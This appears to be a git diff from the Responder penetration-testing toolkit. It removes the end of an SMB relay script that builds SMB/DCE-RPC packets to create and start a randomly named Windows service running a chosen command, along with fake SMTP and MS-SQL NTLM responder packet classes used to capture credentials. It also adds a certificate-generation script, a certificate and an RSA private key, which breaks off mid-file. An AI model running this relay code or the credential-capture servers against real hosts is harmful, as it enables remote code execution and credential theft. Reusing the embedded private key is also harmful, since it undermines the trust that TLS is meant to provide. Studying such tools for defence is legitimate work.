packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC Read.
|
|
||||||
if data[8:10] == "\x2f\x00":
|
|
||||||
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBReadData(FID=f)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC SVCCTLOpenManagerW.
|
|
||||||
if data[8:10] == "\x2e\x00":
|
|
||||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
|
|
||||||
w.calculate()
|
|
||||||
x = SMBDCEPacketData(Data=w)
|
|
||||||
x.calculate()
|
|
||||||
t = SMBWriteData(FID=f,Data=x)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC Read Answer.
|
|
||||||
if data[8:10] == "\x2f\x00":
|
|
||||||
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBReadData(FID=f)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC SVCCTLCreateService.
|
|
||||||
if data[8:10] == "\x2e\x00":
|
|
||||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
|
||||||
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
|
|
||||||
print "[+] Creating service"
|
|
||||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
ContextHandler = data[88:108]
|
|
||||||
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
|
|
||||||
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
|
|
||||||
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
|
|
||||||
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
|
|
||||||
w.calculate()
|
|
||||||
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
|
|
||||||
x.calculate()
|
|
||||||
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC Read Answer.
|
|
||||||
if data[8:10] == "\x2f\x00":
|
|
||||||
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC SVCCTLOpenService.
|
|
||||||
if data[8:10] == "\x2e\x00":
|
|
||||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
|
||||||
print "[+] Failed to create the service"
|
|
||||||
|
|
||||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
|
|
||||||
w.calculate()
|
|
||||||
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
|
|
||||||
x.calculate()
|
|
||||||
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC Read Answer.
|
|
||||||
if data[8:10] == "\x2f\x00":
|
|
||||||
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC SVCCTLStartService.
|
|
||||||
if data[8:10] == "\x2e\x00":
|
|
||||||
if data[len(data)-4:] == "\x05\x00\x00\x00":
|
|
||||||
print "[+] Failed to open the service"
|
|
||||||
ContextHandler = data[88:108]
|
|
||||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
|
|
||||||
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
|
|
||||||
x.calculate()
|
|
||||||
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## DCE/RPC Read Answer.
|
|
||||||
if data[8:10] == "\x2f\x00":
|
|
||||||
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
if data[8:10] == "\x2e\x00":
|
|
||||||
print "[+] Command successful !"
|
|
||||||
Logs.info('Command successful:')
|
|
||||||
Logs.info(Target+","+Username+','+CMD)
|
|
||||||
return True
|
|
||||||
if data[8:10] != "\x2e\x00":
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
|
||||||
def RunInloop(Target,Command,Domain):
|
|
||||||
try:
|
|
||||||
while True:
|
|
||||||
worker = RunRelay(Target,Command,Domain)
|
|
||||||
except:
|
|
||||||
raise
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
try:
|
|
||||||
thread.start_new(RunInloop,(Target,Command,Domain))
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
exit()
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
try:
|
|
||||||
main()
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
raise
|
|
||||||
raw_input()
|
|
||||||
|
|
||||||
@@ -1,74 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#SMTP Greating class
|
|
||||||
class SMTPGreating(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "220"),
|
|
||||||
("Separator", "\x20"),
|
|
||||||
("Message", "smtp01.local ESMTP"),
|
|
||||||
("CRLF", "\x0d\x0a"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMTPAUTH(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code0", "250"),
|
|
||||||
("Separator0", "\x2d"),
|
|
||||||
("Message0", "smtp01.local"),
|
|
||||||
("CRLF0", "\x0d\x0a"),
|
|
||||||
("Code", "250"),
|
|
||||||
("Separator", "\x20"),
|
|
||||||
("Message", "AUTH LOGIN PLAIN XYMCOOKIE"),
|
|
||||||
("CRLF", "\x0d\x0a"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMTPAUTH1(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "334"),
|
|
||||||
("Separator", "\x20"),
|
|
||||||
("Message", "VXNlcm5hbWU6"),#Username
|
|
||||||
("CRLF", "\x0d\x0a"),
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMTPAUTH2(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "334"),
|
|
||||||
("Separator", "\x20"),
|
|
||||||
("Message", "UGFzc3dvcmQ6"),#Password
|
|
||||||
("CRLF", "\x0d\x0a"),
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
|
|
||||||
167
SQLPackets.py
167
SQLPackets.py
@@ -1,167 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#MS-SQL Pre-login packet class
|
|
||||||
class MSSQLPreLoginAnswer(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("PacketType", "\x04"),
|
|
||||||
("Status", "\x01"),
|
|
||||||
("Len", "\x00\x25"),
|
|
||||||
("SPID", "\x00\x00"),
|
|
||||||
("PacketID", "\x01"),
|
|
||||||
("Window", "\x00"),
|
|
||||||
("TokenType", "\x00"),
|
|
||||||
("VersionOffset", "\x00\x15"),
|
|
||||||
("VersionLen", "\x00\x06"),
|
|
||||||
("TokenType1", "\x01"),
|
|
||||||
("EncryptionOffset", "\x00\x1b"),
|
|
||||||
("EncryptionLen", "\x00\x01"),
|
|
||||||
("TokenType2", "\x02"),
|
|
||||||
("InstOptOffset", "\x00\x1c"),
|
|
||||||
("InstOptLen", "\x00\x01"),
|
|
||||||
("TokenTypeThrdID", "\x03"),
|
|
||||||
("ThrdIDOffset", "\x00\x1d"),
|
|
||||||
("ThrdIDLen", "\x00\x00"),
|
|
||||||
("ThrdIDTerminator", "\xff"),
|
|
||||||
("VersionStr", "\x09\x00\x0f\xc3"),
|
|
||||||
("SubBuild", "\x00\x00"),
|
|
||||||
("EncryptionStr", "\x02"),
|
|
||||||
("InstOptStr", "\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
|
|
||||||
|
|
||||||
VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
|
|
||||||
|
|
||||||
EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
|
|
||||||
|
|
||||||
InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
|
|
||||||
|
|
||||||
ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
|
|
||||||
|
|
||||||
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
|
|
||||||
#Version
|
|
||||||
self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
|
|
||||||
self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset))
|
|
||||||
#Encryption
|
|
||||||
self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"]))
|
|
||||||
self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset))
|
|
||||||
#InstOpt
|
|
||||||
self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"]))
|
|
||||||
self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset))
|
|
||||||
#ThrdIDOffset
|
|
||||||
self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset))
|
|
||||||
|
|
||||||
#MS-SQL NTLM Negotiate packet class
|
|
||||||
class MSSQLNTLMChallengeAnswer(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("PacketType", "\x04"),
|
|
||||||
("Status", "\x01"),
|
|
||||||
("Len", "\x00\xc7"),
|
|
||||||
("SPID", "\x00\x00"),
|
|
||||||
("PacketID", "\x01"),
|
|
||||||
("Window", "\x00"),
|
|
||||||
("TokenType", "\xed"),
|
|
||||||
("SSPIBuffLen", "\xbc\x00"),
|
|
||||||
("Signature", "NTLMSSP"),
|
|
||||||
("SignatureNull", "\x00"),
|
|
||||||
("MessageType", "\x02\x00\x00\x00"),
|
|
||||||
("TargetNameLen", "\x06\x00"),
|
|
||||||
("TargetNameMaxLen", "\x06\x00"),
|
|
||||||
("TargetNameOffset", "\x38\x00\x00\x00"),
|
|
||||||
("NegoFlags", "\x05\x02\x89\xa2"),
|
|
||||||
("ServerChallenge", ""),
|
|
||||||
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("TargetInfoLen", "\x7e\x00"),
|
|
||||||
("TargetInfoMaxLen", "\x7e\x00"),
|
|
||||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
|
||||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
|
||||||
("TargetNameStr", "SMB"),
|
|
||||||
("Av1", "\x02\x00"),#nbt name
|
|
||||||
("Av1Len", "\x06\x00"),
|
|
||||||
("Av1Str", "SMB"),
|
|
||||||
("Av2", "\x01\x00"),#Server name
|
|
||||||
("Av2Len", "\x14\x00"),
|
|
||||||
("Av2Str", "SMB-TOOLKIT"),
|
|
||||||
("Av3", "\x04\x00"),#Full Domain name
|
|
||||||
("Av3Len", "\x12\x00"),
|
|
||||||
("Av3Str", "smb.local"),
|
|
||||||
("Av4", "\x03\x00"),#Full machine domain name
|
|
||||||
("Av4Len", "\x28\x00"),
|
|
||||||
("Av4Str", "server2003.smb.local"),
|
|
||||||
("Av5", "\x05\x00"),#Domain Forest Name
|
|
||||||
("Av5Len", "\x12\x00"),
|
|
||||||
("Av5Str", "smb.local"),
|
|
||||||
("Av6", "\x00\x00"),#AvPairs Terminator
|
|
||||||
("Av6Len", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
##First convert to uni
|
|
||||||
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
|
|
||||||
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
|
|
||||||
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
|
|
||||||
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
|
|
||||||
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
|
|
||||||
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
|
|
||||||
##Then calculate
|
|
||||||
|
|
||||||
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
||||||
|
|
||||||
CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
||||||
|
|
||||||
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
|
|
||||||
|
|
||||||
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
|
|
||||||
|
|
||||||
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
||||||
|
|
||||||
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
|
|
||||||
self.fields["SSPIBuffLen"] = struct.pack("<i",len(CalculateSSPI))[:2]
|
|
||||||
# Target Name Offsets
|
|
||||||
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
|
|
||||||
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
||||||
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
||||||
#AvPairs Offsets
|
|
||||||
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
|
|
||||||
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
|
|
||||||
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
|
|
||||||
#AvPairs StrLen
|
|
||||||
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
|
|
||||||
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
|
|
||||||
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
|
|
||||||
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
|
|
||||||
self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
|
|
||||||
#AvPairs 6 len is always 00.
|
|
||||||
3
certs/gen-self-signed-cert.sh
Executable file
3
certs/gen-self-signed-cert.sh
Executable file
@@ -0,0 +1,3 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
openssl genrsa -out responder.key 2048
|
||||||
|
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"
|
||||||
18
certs/responder.crt
Normal file
18
certs/responder.crt
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
|
||||||
|
NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
|
||||||
|
AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
|
||||||
|
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
|
||||||
|
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
|
||||||
|
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
|
||||||
|
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
|
||||||
|
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
|
||||||
|
YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
|
||||||
|
6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
|
||||||
|
YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
|
||||||
|
koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
|
||||||
|
4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
|
||||||
|
YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
|
||||||
|
HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
|
||||||
|
u0/CRCN/lg==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
27
certs/responder.key
Normal file
27
certs/responder.key
Normal file
@@ -0,0 +1,27 @@
|
|||||||
|
-----BEGIN RSA PRIVATE KEY-----
|
||||||
|
MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
|
||||||
|
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
|
||||||
|
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
|
||||||
|
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
|
||||||
|
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
|
||||||
|
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
|
||||||
|
1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
|
||||||
|
kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
|
||||||
|
YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
|
||||||
|
FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
|
||||||
|
erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
|
||||||
|
IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
|
||||||
|
nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
|
||||||
|
LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
|
||||||
|
cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
|
||||||
|
5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
|
||||||
|
s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
|
||||||
|
ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
|
||||||
|
VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
|
||||||
|
